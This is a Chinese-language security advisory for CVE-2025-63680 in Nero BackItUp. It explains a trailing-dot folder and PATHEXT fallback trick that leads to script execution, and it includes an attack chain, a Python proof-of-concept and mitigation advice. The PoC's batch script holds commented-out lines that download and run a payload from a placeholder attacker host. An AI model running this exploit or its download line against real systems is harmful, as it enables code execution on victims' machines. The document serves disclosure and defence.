CVE-2025-63680: Nero BackItUp 路径解析缺陷导致远程代码执行

漏洞信息

漏洞编号

CVE-2025-63680

漏洞类型

路径遍历/UI渲染缺陷导致远程代码执行

CVSS评分

8.6 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Nero BackItUp (Nero Productline 2019-2025及更早版本)

漏洞概述

CVE-2025-63680是Nero BackItUp软件中的一个高危安全漏洞，CVSS评分8.6。该漏洞属于路径解析/UI渲染缺陷（CWE-22），存在于Nero Productline系列产品中。攻击者利用Windows ShellExecuteW的扩展名回退机制，通过创建带有尾部点的文件夹并在其中放置同名脚本文件，诱使软件将脚本渲染为文件夹图标。当用户点击该伪造的文件夹时，ShellExecuteW会通过PATHEXT回退机制（.COM/.EXE/.BAT/.CMD）执行其中的恶意脚本，从而实现任意代码执行。此漏洞影响Nero BackItUp 2019至2025版本及更早版本，厂商已确认此问题。由于攻击复杂度低且无需特殊权限即可利用，建议用户尽快采取防护措施。

技术细节

该漏洞的核心在于Nero BackItUp对文件路径的处理逻辑存在缺陷。当软件遍历文件系统时，尾部点文件夹（如test.）在Windows系统中仍被视为有效路径，但文件系统会将其作为文件而非目录处理。攻击者创建一个名为test.的文件夹，并在其中放置名为test.bat或test.cmd的脚本文件。由于Windows的ShellExecuteW函数在执行文件时会按照PATHEXT环境变量定义的顺序（.COM > .EXE > .BAT > .CMD）查找并执行匹配的可执行文件，当Nero BackItUp调用ShellExecuteW打开该路径时，系统会识别到test.bat并执行其中的命令。这意味着攻击者可以通过精心构造的脚本实现任意代码执行，包括下载恶意载荷、建立持久化后门或执行系统级操作。整个攻击过程无需认证权限，仅需诱导用户点击伪造的文件夹图标即可触发。

攻击链分析

STEP 1

步骤1: 侦察与准备

攻击者识别目标系统上安装的Nero BackItUp版本，确认版本在2019-2025范围内。攻击者准备恶意脚本（如.bat/.cmd文件），包含下载恶意载荷、建立后门或执行系统命令的代码。

STEP 2

步骤2: 创建尾部点文件夹

攻击者在Nero BackItUp可访问的目录（如备份目标路径）中创建一个带有尾部点的文件夹（如Backup.）。在Windows文件系统中，这种命名方式会使文件夹实际表现为文件而非目录。

STEP 3

步骤3: 植入恶意脚本

攻击者在该尾部点文件夹内放置与文件夹同名的脚本文件（如Backup.bat或Backup.cmd）。由于路径解析特性，软件仍能识别并处理该文件。

STEP 4

步骤4: 诱骗用户交互

当Nero BackItUp扫描文件系统时，它会错误地将尾部点路径渲染为文件夹图标。用户看到的是一个普通的文件夹图标，但实际是伪装成文件夹的恶意脚本位置。

STEP 5

步骤5: 代码执行

用户点击该伪造的文件夹图标时，Nero BackItUp调用Windows ShellExecuteW函数。由于PATHEXT环境变量定义了.COM/.EXE/.BAT/.CMD的查找顺序，系统识别到同名脚本文件并自动执行其中的恶意代码。

STEP 6

步骤6: 达成攻击目标

恶意脚本成功执行后，攻击者可实现任意代码执行，包括：下载并运行外部恶意程序、窃取敏感数据、建立持久化后门、横向移动等后续攻击活动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2025-63680 - Nero BackItUp Path Traversal RCE
# Author: Security Researcher
# Target: Nero BackItUp 2019-2025

import os
import shutil

def create_exploit_folder(base_name="Backup"):
    """
    Create trailing-dot folder with malicious script inside.
    This exploits ShellExecuteW PATHEXT fallback behavior.
    """
    # Create folder with trailing dot (becomes file in Windows)
    folder_path = os.path.join(os.getcwd(), f"{base_name}.")
    
    # Remove if exists
    if os.path.exists(folder_path):
        if os.path.isfile(folder_path):
            os.remove(folder_path)
        else:
            shutil.rmtree(folder_path)
    
    # Create as directory first
    os.makedirs(folder_path, exist_ok=True)
    
    # Create malicious script with same base name
    script_content = '''@echo off
rem CVE-2025-63680 PoC - Arbitrary Code Execution
rem This script executes when user clicks the fake folder
rem Replace with actual malicious payload

echo [+] CVE-2025-63680 Exploit Triggered > poc_triggered.txt
whoami >> poc_triggered.txt
date /t >> poc_triggered.txt
time /t >> poc_triggered.txt

rem Example: Download and execute payload
rem curl -o payload.exe http://attacker.com/payload.exe
rem start payload.exe
'''
    
    # Try multiple extensions for PATHEXT fallback
    for ext in ['.bat', '.cmd', '.exe', '.com']:
        script_path = os.path.join(folder_path, f"{base_name}{ext}")
        try:
            with open(script_path, 'w') as f:
                f.write(script_content)
            print(f"[+] Created: {script_path}")
        except Exception as e:
            print(f"[-] Failed to create {script_path}: {e}")
    
    print(f"\n[+] Exploit folder created: {folder_path}")
    print("[+] When Nero BackItUp displays this as folder and user clicks it,")
    print("[+] ShellExecuteW will execute the script via PATHEXT fallback")

if __name__ == "__main__":
    create_exploit_folder()

影响范围

Nero BackItUp 2019

Nero BackItUp 2020

Nero BackItUp 2021

Nero BackItUp 2022

Nero BackItUp 2023

Nero BackItUp 2024

Nero BackItUp 2025

Nero Productline 早期版本

防御指南

临时缓解措施

在官方补丁发布前，建议采取以下临时缓解措施：1) 限制非管理员用户对文件系统的写入权限，特别是Nero BackItUp的备份目录；2) 禁用或限制.bat/.cmd/.com文件的执行，可通过AppLocker或Windows Defender Application Control实现；3) 启用Windows Defender的攻击面减少(ASR)规则，阻止可疑脚本执行；4) 对用户进行安全意识培训，提醒不要点击来源不明的文件夹或文件；5) 考虑使用虚拟化技术隔离Nero BackItUp运行环境；6) 监控系统日志中的ShellExecuteW异常调用事件。